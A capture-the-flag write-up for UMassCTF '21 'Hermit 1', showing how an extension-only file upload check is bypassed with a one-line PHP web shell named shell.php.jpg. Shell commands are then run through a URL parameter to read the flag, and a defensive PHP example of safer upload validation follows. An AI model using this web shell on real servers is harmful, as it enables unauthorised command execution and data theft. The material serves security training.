UMassCTF '21 Hermit 1 WriteUp
March 28, 2021
Solution
There is only one form that accepts a file.
The file is validated only by its extension, so we can try uploading an "image" named shell.php.jpg
with content like this:
<?=`$_GET[0]`?>
When the image is uploaded we see a page like this:
Click on See image and we see a blank page with some strange PHP errors. That's because our "image" expects a GET parameter called "0", so let's add one:
104.197.195.221:8086/show.php?filename=VbvJC0&0=ls
and we can see the list of directories in the project root.
Now it's time to search for the flag. Let's check the home directory like this:
104.197.195.221:8086/show.php?filename=VbvJC0&0=ls /home
We see there is only one folder, hermit.
Let's check that folder:
104.197.195.221:8086/show.php?filename=VbvJC0&0=ls /home/hermit
- and there is a flag folder now.
104.197.195.221:8086/show.php?filename=VbvJC0&0=ls /home/hermit/flag
- shows us userflag.txt
104.197.195.221:8086/show.php?filename=VbvJC0&0=cat /home/hermit/flag/userflag.txt
- shows us the flag
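For the defensive side, here is a sketch of an upload and display path that would have stopped this. It is an added example, not the challenge's source: it assumes show.php hands the stored file to the PHP interpreter (which the PHP errors above suggest), and the function names, allowlist and storage layout are made up for illustration.

```php
<?php
// Added example, not the challenge's code; names, allowlist and storage layout are assumptions.
declare(strict_types=1);
const ALLOWED = ['image/jpeg' => 'jpg', 'image/png' => 'png', 'image/gif' => 'gif'];

// Decide from the file's bytes, never from the client-supplied name.
// Returns the stored name, or null when the content is not an allowed image.
function store_upload(string $tmpPath, string $uploadDir): ?string
{
    $mime = (new finfo(FILEINFO_MIME_TYPE))->file($tmpPath);
    if ($mime === false || !isset(ALLOWED[$mime])) {
        return null;
    }
    // Server-chosen name and extension: "shell.php.jpg" never reaches disk.
    $name = bin2hex(random_bytes(8)) . '.' . ALLOWED[$mime];
    // A real handler would use move_uploaded_file(); copy() keeps the demo runnable.
    return copy($tmpPath, "$uploadDir/$name") ? $name : null;
}

// Serve the stored bytes as data: readfile() streams them, while include/require
// would execute them, so a polyglot with a valid image header stays inert.
function serve_upload(string $name, string $uploadDir): void
{
    $path = $uploadDir . '/' . basename($name);   // strip any directory part
    $mime = array_search(pathinfo($path, PATHINFO_EXTENSION), ALLOWED, true);
    if ($mime === false || !is_file($path)) {
        http_response_code(404);
        return;
    }
    header("Content-Type: $mime");
    header('X-Content-Type-Options: nosniff');
    readfile($path);
}

// Demo on constructed inputs (run from the command line).
if (PHP_SAPI === 'cli') {
    $dir = sys_get_temp_dir();
    $samples = [
        'shell.php.jpg' => "<?php echo 'constructed sample'; ?>",
        'pixel.gif'     => "GIF89a\x01\x00\x01\x00\x00\x00\x00;",
    ];
    foreach ($samples as $clientName => $bytes) {
        $tmp = tempnam($dir, 'up');
        file_put_contents($tmp, $bytes);
        $stored = store_upload($tmp, $dir);
        echo $clientName, ' => ', $stored ?? 'rejected', PHP_EOL;
        unlink($tmp);
        if ($stored !== null) { unlink("$dir/$stored"); }
    }
}
```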